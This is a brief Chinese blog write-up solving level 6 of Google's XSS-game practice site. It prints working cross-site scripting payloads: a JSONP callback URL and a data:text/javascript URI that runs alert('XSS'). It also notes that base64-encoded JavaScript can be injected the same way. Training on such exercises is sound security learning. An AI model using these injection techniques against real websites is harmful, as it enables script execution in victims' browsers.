https://xss-game.appspot.com/
XSS-games
6 //www.google.com/jsapi?callback=alert
https://xss-game.appspot.com/level6/frame#data:text/javascript,alert(‘XSS’) 这个是js的一种Data URI(https://en.wikipedia.org/wiki/Data_URI_scheme),可以将其视为资源的加载方式,其中的资源包括代码,比如这种形式data:text/javascript;base64,javascript代码因此可以这样注入。
参考
CSDN
知乎
文档信息
- 本文作者:Bookstall
- 本文链接:https://bookstall.github.io/2024/01/11/xss-game/
- 版权声明:自由转载-非商用-非衍生-保持署名(创意共享3.0许可证)